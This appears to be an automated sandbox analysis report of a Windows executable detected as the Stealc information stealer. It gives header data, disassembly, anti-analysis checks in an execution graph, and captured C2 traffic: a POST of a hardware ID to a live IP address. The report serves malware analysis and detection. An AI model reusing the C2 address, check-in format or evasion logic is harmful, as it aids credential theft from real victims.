                                Entrypoint:0xa8b000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FFBC8E1629Ah
                                jp 00007FFBC8E162B1h
                                add byte ptr [eax], al
                                jmp 00007FFBC8E18295h
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop ds
                                add byte ptr [eax+000000FEh], ah
                                add byte ptr [edx], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax*4], cl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x22800cfab91be806f659f17aba06f50d814a0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x25e0000x2970000x2005f42cc3e3158cd8393a37907263bbbb5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                iinbofzt0x4f50000x1950000x194a00df5dc6680f85b8caa0dfcb4cca5e1187False0.9948670885464936data7.954146839777977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                gnwcqqyo0x68a0000x10000x40087a921d6bf1276d759e3ac9c6df8b4bcFalse0.8525390625data6.423582088348747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x68b0000x30000x2200c318f9e3cfb177cf36d258629697da57False0.06767003676470588DOS executable (COM)0.8875314144640459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-11T16:00:06.089634+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 11, 2024 16:00:05.101735115 CEST4973080192.168.2.4185.215.113.37
                                Oct 11, 2024 16:00:05.107006073 CEST8049730185.215.113.37192.168.2.4
                                Oct 11, 2024 16:00:05.107136011 CEST4973080192.168.2.4185.215.113.37
                                Oct 11, 2024 16:00:05.107247114 CEST4973080192.168.2.4185.215.113.37
                                Oct 11, 2024 16:00:05.112150908 CEST8049730185.215.113.37192.168.2.4
                                Oct 11, 2024 16:00:05.834851980 CEST8049730185.215.113.37192.168.2.4
                                Oct 11, 2024 16:00:05.835119009 CEST4973080192.168.2.4185.215.113.37
                                Oct 11, 2024 16:00:05.853163004 CEST4973080192.168.2.4185.215.113.37
                                Oct 11, 2024 16:00:05.858232021 CEST8049730185.215.113.37192.168.2.4
                                Oct 11, 2024 16:00:06.089396000 CEST8049730185.215.113.37192.168.2.4
                                Oct 11, 2024 16:00:06.089633942 CEST4973080192.168.2.4185.215.113.37
                                Oct 11, 2024 16:00:10.815188885 CEST4973080192.168.2.4185.215.113.37

                                HTTP Request Dependency Graph

                                • 185.215.113.37

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730185.215.113.37806280C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 11, 2024 16:00:05.107247114 CEST89OUTGET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 11, 2024 16:00:05.834851980 CEST203INHTTP/1.1 200 OK
                                Date: Fri, 11 Oct 2024 14:00:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 11, 2024 16:00:05.853163004 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a
                                Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--
                                Oct 11, 2024 16:00:06.089396000 CEST210INHTTP/1.1 200 OK
                                Date: Fri, 11 Oct 2024 14:00:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:10:00:02
                                Start date:11/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x530000
                                File size:1'813'504 bytes
                                MD5 hash:1AD0CCF6D6AA03EBE1F0D87E2B21E748
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:9.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.7%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
                                  execution_graph 13278 5469f0 13323 532260 13278->13323 13302 546a64 13303 54a9b0 4 API calls 13302->13303 13304 546a6b 13303->13304 13305 54a9b0 4 API calls 13304->13305 13306 546a72 13305->13306 13307 54a9b0 4 API calls 13306->13307 13308 546a79 13307->13308 13309 54a9b0 4 API calls 13308->13309 13310 546a80 13309->13310 13475 54a8a0 13310->13475 13312 546b0c 13479 546920 GetSystemTime 13312->13479 13314 546a89 13314->13312 13316 546ac2 OpenEventA 13314->13316 13318 546af5 CloseHandle Sleep 13316->13318 13319 546ad9 13316->13319 13321 546b0a 13318->13321 13322 546ae1 CreateEventA 13319->13322 13321->13314 13322->13312 13676 5345c0 13323->13676 13325 532274 13326 5345c0 2 API calls 13325->13326 13327 53228d 13326->13327 13328 5345c0 2 API calls 13327->13328 13329 5322a6 13328->13329 13330 5345c0 2 API calls 13329->13330 13331 5322bf 13330->13331 13332 5345c0 2 API calls 13331->13332 13333 5322d8 13332->13333 13334 5345c0 2 API calls 13333->13334 13335 5322f1 13334->13335 13336 5345c0 2 API calls 13335->13336 13337 53230a 13336->13337 13338 5345c0 2 API calls 13337->13338 13339 532323 13338->13339 13340 5345c0 2 API calls 13339->13340 13341 53233c 13340->13341 13342 5345c0 2 API calls 13341->13342 13343 532355 13342->13343 13344 5345c0 2 API calls 13343->13344 13345 53236e 13344->13345 13346 5345c0 2 API calls 13345->13346 13347 532387 13346->13347 13348 5345c0 2 API calls 13347->13348 13349 5323a0 13348->13349 13350 5345c0 2 API calls 13349->13350 13351 5323b9 13350->13351 13352 5345c0 2 API calls 13351->13352 13353 5323d2 13352->13353 13354 5345c0 2 API calls 13353->13354 13355 5323eb 13354->13355 13356 5345c0 2 API calls 13355->13356 13357 532404 13356->13357 13358 5345c0 2 API calls 13357->13358 13359 53241d 13358->13359 13360 5345c0 2 API calls 13359->13360 13361 532436 13360->13361 13362 5345c0 2 API calls 13361->13362 13363 53244f 13362->13363 13364 5345c0 2 API calls 13363->13364 13365 532468 13364->13365 13366 5345c0 2 API calls 13365->13366 13367 532481 13366->13367 13368 5345c0 2 API calls 13367->13368 13369 53249a 13368->13369 13370 5345c0 2 API calls 13369->13370 13371 5324b3 13370->13371 13372 5345c0 2 API calls 13371->13372 13373 5324cc 13372->13373 13374 5345c0 2 API calls 13373->13374 13375 5324e5 13374->13375 13376 5345c0 2 API calls 13375->13376 13377 5324fe 13376->13377 13378 5345c0 2 API calls 13377->13378 13379 532517 13378->13379 13380 5345c0 2 API calls 13379->13380 13381 532530 13380->13381 13382 5345c0 2 API calls 13381->13382 13383 532549 13382->13383 13384 5345c0 2 API calls 13383->13384 13385 532562 13384->13385 13386 5345c0 2 API calls 13385->13386 13387 53257b 13386->13387 13388 5345c0 2 API calls 13387->13388 13389 532594 13388->13389 13390 5345c0 2 API calls 13389->13390 13391 5325ad 13390->13391 13392 5345c0 2 API calls 13391->13392 13393 5325c6 13392->13393 13394 5345c0 2 API calls 13393->13394 13395 5325df 13394->13395 13396 5345c0 2 API calls 13395->13396 13397 5325f8 13396->13397 13398 5345c0 2 API calls 13397->13398 13399 532611 13398->13399 13400 5345c0 2 API calls 13399->13400 13401 53262a 13400->13401 13402 5345c0 2 API calls 13401->13402 13403 532643 13402->13403 13404 5345c0 2 API calls 13403->13404 13405 53265c 13404->13405 13406 5345c0 2 API calls 13405->13406 13407 532675 13406->13407 13408 5345c0 2 API calls 13407->13408 13409 53268e 13408->13409 13410 549860 13409->13410 13681 549750 GetPEB 13410->13681 13412 549868 13413 549a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13412->13413 13414 54987a 13412->13414 13415 549af4 GetProcAddress 13413->13415 13416 549b0d 13413->13416 13417 54988c 21 API calls 13414->13417 13415->13416 13418 549b46 13416->13418 13419 549b16 GetProcAddress GetProcAddress 13416->13419 13417->13413 13420 549b4f GetProcAddress 13418->13420 13421 549b68 13418->13421 13419->13418 13420->13421 13422 549b71 GetProcAddress 13421->13422 13423 549b89 13421->13423 13422->13423 13424 546a00 13423->13424 13425 549b92 GetProcAddress GetProcAddress 13423->13425 13426 54a740 13424->13426 13425->13424 13427 54a750 13426->13427 13428 546a0d 13427->13428 13429 54a77e lstrcpy 13427->13429 13430 5311d0 13428->13430 13429->13428 13431 5311e8 13430->13431 13432 531217 13431->13432 13433 53120f ExitProcess 13431->13433 13434 531160 GetSystemInfo 13432->13434 13435 531184 13434->13435 13436 53117c ExitProcess 13434->13436 13437 531110 GetCurrentProcess VirtualAllocExNuma 13435->13437 13438 531141 ExitProcess 13437->13438 13439 531149 13437->13439 13682 5310a0 VirtualAlloc 13439->13682 13442 531220 13686 5489b0 13442->13686 13445 531249 13446 53129a 13445->13446 13447 531292 ExitProcess 13445->13447 13448 546770 GetUserDefaultLangID 13446->13448 13449 546792 13448->13449 13450 5467d3 13448->13450 13449->13450 13451 5467b7 ExitProcess 13449->13451 13452 5467c1 ExitProcess 13449->13452 13453 5467a3 ExitProcess 13449->13453 13454 5467ad ExitProcess 13449->13454 13455 5467cb ExitProcess 13449->13455 13456 531190 13450->13456 13457 5478e0 3 API calls 13456->13457 13458 53119e 13457->13458 13459 5311cc 13458->13459 13460 547850 3 API calls 13458->13460 13463 547850 GetProcessHeap RtlAllocateHeap GetUserNameA 13459->13463 13461 5311b7 13460->13461 13461->13459 13462 5311c4 ExitProcess 13461->13462 13464 546a30 13463->13464 13465 5478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13464->13465 13466 546a43 13465->13466 13467 54a9b0 13466->13467 13688 54a710 13467->13688 13469 54a9c1 lstrlen 13471 54a9e0 13469->13471 13470 54aa18 13689 54a7a0 13470->13689 13471->13470 13473 54a9fa lstrcpy lstrcat 13471->13473 13473->13470 13474 54aa24 13474->13302 13476 54a8bb 13475->13476 13477 54a90b 13476->13477 13478 54a8f9 lstrcpy 13476->13478 13477->13314 13478->13477 13693 546820 13479->13693 13481 54698e 13482 546998 sscanf 13481->13482 13722 54a800 13482->13722 13484 5469aa SystemTimeToFileTime SystemTimeToFileTime 13485 5469e0 13484->13485 13486 5469ce 13484->13486 13488 545b10 13485->13488 13486->13485 13487 5469d8 ExitProcess 13486->13487 13489 545b1d 13488->13489 13490 54a740 lstrcpy 13489->13490 13491 545b2e 13490->13491 13724 54a820 lstrlen 13491->13724 13494 54a820 2 API calls 13495 545b64 13494->13495 13496 54a820 2 API calls 13495->13496 13497 545b74 13496->13497 13728 546430 13497->13728 13500 54a820 2 API calls 13501 545b93 13500->13501 13502 54a820 2 API calls 13501->13502 13503 545ba0 13502->13503 13504 54a820 2 API calls 13503->13504 13505 545bad 13504->13505 13506 54a820 2 API calls 13505->13506 13507 545bf9 13506->13507 13737 5326a0 13507->13737 13515 545cc3 13516 546430 lstrcpy 13515->13516 13517 545cd5 13516->13517 13518 54a7a0 lstrcpy 13517->13518 13519 545cf2 13518->13519 13520 54a9b0 4 API calls 13519->13520 13521 545d0a 13520->13521 13522 54a8a0 lstrcpy 13521->13522 13523 545d16 13522->13523 13524 54a9b0 4 API calls 13523->13524 13525 545d3a 13524->13525 13526 54a8a0 lstrcpy 13525->13526 13527 545d46 13526->13527 13528 54a9b0 4 API calls 13527->13528 13529 545d6a 13528->13529 13530 54a8a0 lstrcpy 13529->13530 13531 545d76 13530->13531 13532 54a740 lstrcpy 13531->13532 13533 545d9e 13532->13533 14463 547500 GetWindowsDirectoryA 13533->14463 13536 54a7a0 lstrcpy 13537 545db8 13536->13537 14473 534880 13537->14473 13539 545dbe 14618 5417a0 13539->14618 13541 545dc6 13542 54a740 lstrcpy 13541->13542 13543 545de9 13542->13543 13544 531590 lstrcpy 13543->13544 13545 545dfd 13544->13545 14634 535960 13545->14634 13547 545e03 14778 541050 13547->14778 13549 545e0e 13550 54a740 lstrcpy 13549->13550 13551 545e32 13550->13551 13552 531590 lstrcpy 13551->13552 13553 545e46 13552->13553 13554 535960 34 API calls 13553->13554 13555 545e4c 13554->13555 14782 540d90 13555->14782 13557 545e57 13558 54a740 lstrcpy 13557->13558 13559 545e79 13558->13559 13560 531590 lstrcpy 13559->13560 13561 545e8d 13560->13561 13562 535960 34 API calls 13561->13562 13563 545e93 13562->13563 14789 540f40 13563->14789 13565 545e9e 13566 531590 lstrcpy 13565->13566 13567 545eb5 13566->13567 14794 541a10 13567->14794 13569 545eba 13570 54a740 lstrcpy 13569->13570 13571 545ed6 13570->13571 15138 534fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13571->15138 13573 545edb 13574 531590 lstrcpy 13573->13574 13575 545f5b 13574->13575 15145 540740 13575->15145 13577 545f60 13578 54a740 lstrcpy 13577->13578 13579 545f86 13578->13579 13580 531590 lstrcpy 13579->13580 13581 545f9a 13580->13581 13582 535960 34 API calls 13581->13582 13583 545fa0 13582->13583 13677 5345d1 RtlAllocateHeap 13676->13677 13680 534621 VirtualProtect 13677->13680 13680->13325 13681->13412 13684 5310c2 codecvt 13682->13684 13683 5310fd 13683->13442 13684->13683 13685 5310e2 VirtualFree 13684->13685 13685->13683 13687 531233 GlobalMemoryStatusEx 13686->13687 13687->13445 13688->13469 13690 54a7c2 13689->13690 13691 54a7ec 13690->13691 13692 54a7da lstrcpy 13690->13692 13691->13474 13692->13691 13694 54a740 lstrcpy 13693->13694 13695 546833 13694->13695 13696 54a9b0 4 API calls 13695->13696 13697 546845 13696->13697 13698 54a8a0 lstrcpy 13697->13698 13699 54684e 13698->13699 13700 54a9b0 4 API calls 13699->13700 13701 546867 13700->13701 13702 54a8a0 lstrcpy 13701->13702 13703 546870 13702->13703 13704 54a9b0 4 API calls 13703->13704 13705 54688a 13704->13705 13706 54a8a0 lstrcpy 13705->13706 13707 546893 13706->13707 13708 54a9b0 4 API calls 13707->13708 13709 5468ac 13708->13709 13710 54a8a0 lstrcpy 13709->13710 13711 5468b5 13710->13711 13712 54a9b0 4 API calls 13711->13712 13713 5468cf 13712->13713 13714 54a8a0 lstrcpy 13713->13714 13715 5468d8 13714->13715 13716 54a9b0 4 API calls 13715->13716 13717 5468f3 13716->13717 13718 54a8a0 lstrcpy 13717->13718 13719 5468fc 13718->13719 13720 54a7a0 lstrcpy 13719->13720 13721 546910 13720->13721 13721->13481 13723 54a812 13722->13723 13723->13484 13725 54a83f 13724->13725 13726 545b54 13725->13726 13727 54a87b lstrcpy 13725->13727 13726->13494 13727->13726 13729 54a8a0 lstrcpy 13728->13729 13730 546443 13729->13730 13731 54a8a0 lstrcpy 13730->13731 13732 546455 13731->13732 13733 54a8a0 lstrcpy 13732->13733 13734 546467 13733->13734 13735 54a8a0 lstrcpy 13734->13735 13736 545b86 13735->13736 13736->13500 13738 5345c0 2 API calls 13737->13738 13739 5326b4 13738->13739 13740 5345c0 2 API calls 13739->13740 13741 5326d7 13740->13741 13742 5345c0 2 API calls 13741->13742 13743 5326f0 13742->13743 13744 5345c0 2 API calls 13743->13744 13745 532709 13744->13745 13746 5345c0 2 API calls 13745->13746 13747 532736 13746->13747 13748 5345c0 2 API calls 13747->13748 13749 53274f 13748->13749 13750 5345c0 2 API calls 13749->13750 13751 532768 13750->13751 13752 5345c0 2 API calls 13751->13752 13753 532795 13752->13753 13754 5345c0 2 API calls 13753->13754 13755 5327ae 13754->13755 13756 5345c0 2 API calls 13755->13756 13757 5327c7 13756->13757 13758 5345c0 2 API calls 13757->13758 13759 5327e0 13758->13759 13760 5345c0 2 API calls 13759->13760 13761 5327f9 13760->13761 13762 5345c0 2 API calls 13761->13762 13763 532812 13762->13763 13764 5345c0 2 API calls 13763->13764 13765 53282b 13764->13765 13766 5345c0 2 API calls 13765->13766 13767 532844 13766->13767 13768 5345c0 2 API calls 13767->13768 13769 53285d 13768->13769 13770 5345c0 2 API calls 13769->13770 13771 532876 13770->13771 13772 5345c0 2 API calls 13771->13772 13773 53288f 13772->13773 13774 5345c0 2 API calls 13773->13774 13775 5328a8 13774->13775 13776 5345c0 2 API calls 13775->13776 13777 5328c1 13776->13777 13778 5345c0 2 API calls 13777->13778 13779 5328da 13778->13779 13780 5345c0 2 API calls 13779->13780 13781 5328f3 13780->13781 13782 5345c0 2 API calls 13781->13782 13783 53290c 13782->13783 13784 5345c0 2 API calls 13783->13784 13785 532925 13784->13785 13786 5345c0 2 API calls 13785->13786 13787 53293e 13786->13787 13788 5345c0 2 API calls 13787->13788 13789 532957 13788->13789 13790 5345c0 2 API calls 13789->13790 13791 532970 13790->13791 13792 5345c0 2 API calls 13791->13792 13793 532989 13792->13793 13794 5345c0 2 API calls 13793->13794 13795 5329a2 13794->13795 13796 5345c0 2 API calls 13795->13796 13797 5329bb 13796->13797 13798 5345c0 2 API calls 13797->13798 13799 5329d4 13798->13799 13800 5345c0 2 API calls 13799->13800 13801 5329ed 13800->13801 13802 5345c0 2 API calls 13801->13802 13803 532a06 13802->13803 13804 5345c0 2 API calls 13803->13804 13805 532a1f 13804->13805 13806 5345c0 2 API calls 13805->13806 13807 532a38 13806->13807 13808 5345c0 2 API calls 13807->13808 13809 532a51 13808->13809 13810 5345c0 2 API calls 13809->13810 13811 532a6a 13810->13811 13812 5345c0 2 API calls 13811->13812 13813 532a83 13812->13813 13814 5345c0 2 API calls 13813->13814 13815 532a9c 13814->13815 13816 5345c0 2 API calls 13815->13816 13817 532ab5 13816->13817 13818 5345c0 2 API calls 13817->13818 13819 532ace 13818->13819 13820 5345c0 2 API calls 13819->13820 13821 532ae7 13820->13821 13822 5345c0 2 API calls 13821->13822 13823 532b00 13822->13823 13824 5345c0 2 API calls 13823->13824 13825 532b19 13824->13825 13826 5345c0 2 API calls 13825->13826 13827 532b32 13826->13827 13828 5345c0 2 API calls 13827->13828 13829 532b4b 13828->13829 13830 5345c0 2 API calls 13829->13830 13831 532b64 13830->13831 13832 5345c0 2 API calls 13831->13832 13833 532b7d 13832->13833 13834 5345c0 2 API calls 13833->13834 13835 532b96 13834->13835 13836 5345c0 2 API calls 13835->13836 13837 532baf 13836->13837 13838 5345c0 2 API calls 13837->13838 13839 532bc8 13838->13839 13840 5345c0 2 API calls 13839->13840 13841 532be1 13840->13841 13842 5345c0 2 API calls 13841->13842 13843 532bfa 13842->13843 13844 5345c0 2 API calls 13843->13844 13845 532c13 13844->13845 13846 5345c0 2 API calls 13845->13846 13847 532c2c 13846->13847 13848 5345c0 2 API calls 13847->13848 13849 532c45 13848->13849 13850 5345c0 2 API calls 13849->13850 13851 532c5e 13850->13851 13852 5345c0 2 API calls 13851->13852 13853 532c77 13852->13853 13854 5345c0 2 API calls 13853->13854 13855 532c90 13854->13855 13856 5345c0 2 API calls 13855->13856 13857 532ca9 13856->13857 13858 5345c0 2 API calls 13857->13858 13859 532cc2 13858->13859 13860 5345c0 2 API calls 13859->13860 13861 532cdb 13860->13861 13862 5345c0 2 API calls 13861->13862 13863 532cf4 13862->13863 13864 5345c0 2 API calls 13863->13864 13865 532d0d 13864->13865 13866 5345c0 2 API calls 13865->13866 13867 532d26 13866->13867 13868 5345c0 2 API calls 13867->13868 13869 532d3f 13868->13869 13870 5345c0 2 API calls 13869->13870 13871 532d58 13870->13871 13872 5345c0 2 API calls 13871->13872 13873 532d71 13872->13873 13874 5345c0 2 API calls 13873->13874 13875 532d8a 13874->13875 13876 5345c0 2 API calls 13875->13876 13877 532da3 13876->13877 13878 5345c0 2 API calls 13877->13878 13879 532dbc 13878->13879 13880 5345c0 2 API calls 13879->13880 13881 532dd5 13880->13881 13882 5345c0 2 API calls 13881->13882 13883 532dee 13882->13883 13884 5345c0 2 API calls 13883->13884 13885 532e07 13884->13885 13886 5345c0 2 API calls 13885->13886 13887 532e20 13886->13887 13888 5345c0 2 API calls 13887->13888 13889 532e39 13888->13889 13890 5345c0 2 API calls 13889->13890 13891 532e52 13890->13891 13892 5345c0 2 API calls 13891->13892 13893 532e6b 13892->13893 13894 5345c0 2 API calls 13893->13894 13895 532e84 13894->13895 13896 5345c0 2 API calls 13895->13896 13897 532e9d 13896->13897 13898 5345c0 2 API calls 13897->13898 13899 532eb6 13898->13899 13900 5345c0 2 API calls 13899->13900 13901 532ecf 13900->13901 13902 5345c0 2 API calls 13901->13902 13903 532ee8 13902->13903 13904 5345c0 2 API calls 13903->13904 13905 532f01 13904->13905 13906 5345c0 2 API calls 13905->13906 13907 532f1a 13906->13907 13908 5345c0 2 API calls 13907->13908 13909 532f33 13908->13909 13910 5345c0 2 API calls 13909->13910 13911 532f4c 13910->13911 13912 5345c0 2 API calls 13911->13912 13913 532f65 13912->13913 13914 5345c0 2 API calls 13913->13914 13915 532f7e 13914->13915 13916 5345c0 2 API calls 13915->13916 13917 532f97 13916->13917 13918 5345c0 2 API calls 13917->13918 13919 532fb0 13918->13919 13920 5345c0 2 API calls 13919->13920 13921 532fc9 13920->13921 13922 5345c0 2 API calls 13921->13922 13923 532fe2 13922->13923 13924 5345c0 2 API calls 13923->13924 13925 532ffb 13924->13925 13926 5345c0 2 API calls 13925->13926 13927 533014 13926->13927 13928 5345c0 2 API calls 13927->13928 13929 53302d 13928->13929 13930 5345c0 2 API calls 13929->13930 13931 533046 13930->13931 13932 5345c0 2 API calls 13931->13932 13933 53305f 13932->13933 13934 5345c0 2 API calls 13933->13934 13935 533078 13934->13935 13936 5345c0 2 API calls 13935->13936 13937 533091 13936->13937 13938 5345c0 2 API calls 13937->13938 13939 5330aa 13938->13939 13940 5345c0 2 API calls 13939->13940 13941 5330c3 13940->13941 13942 5345c0 2 API calls 13941->13942 13943 5330dc 13942->13943 13944 5345c0 2 API calls 13943->13944 13945 5330f5 13944->13945 13946 5345c0 2 API calls 13945->13946 13947 53310e 13946->13947 13948 5345c0 2 API calls 13947->13948 13949 533127 13948->13949 13950 5345c0 2 API calls 13949->13950 13951 533140 13950->13951 13952 5345c0 2 API calls 13951->13952 13953 533159 13952->13953 13954 5345c0 2 API calls 13953->13954 13955 533172 13954->13955 13956 5345c0 2 API calls 13955->13956 13957 53318b 13956->13957 13958 5345c0 2 API calls 13957->13958 13959 5331a4 13958->13959 13960 5345c0 2 API calls 13959->13960 13961 5331bd 13960->13961 13962 5345c0 2 API calls 13961->13962 13963 5331d6 13962->13963 13964 5345c0 2 API calls 13963->13964 13965 5331ef 13964->13965 13966 5345c0 2 API calls 13965->13966 13967 533208 13966->13967 13968 5345c0 2 API calls 13967->13968 13969 533221 13968->13969 13970 5345c0 2 API calls 13969->13970 13971 53323a 13970->13971 13972 5345c0 2 API calls 13971->13972 13973 533253 13972->13973 13974 5345c0 2 API calls 13973->13974 13975 